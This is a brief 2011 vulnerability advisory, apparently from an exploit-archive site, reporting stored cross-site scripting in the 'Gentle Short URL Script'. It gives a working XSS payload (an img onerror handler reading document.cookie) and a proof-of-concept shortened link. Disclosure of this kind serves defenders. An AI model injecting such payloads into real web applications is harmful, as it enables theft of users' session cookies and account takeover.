Gentle Short URL Script Stored Cross Site Scripting

2011.09.05

Credit: Eyup CELIK

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Gentle Short URL Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr

ISSUE

Link shorten, send to a victim.

Vulnerable Module: Shorten URL Statics
The end of the shortened link ! mentions

Exploit:
"/></a></><img src=1.gif onerror=alert(document.cookie)>

POC:
http://unrelo.com/PJls!


Thanks,


Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Gentle Short URL Script Stored Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.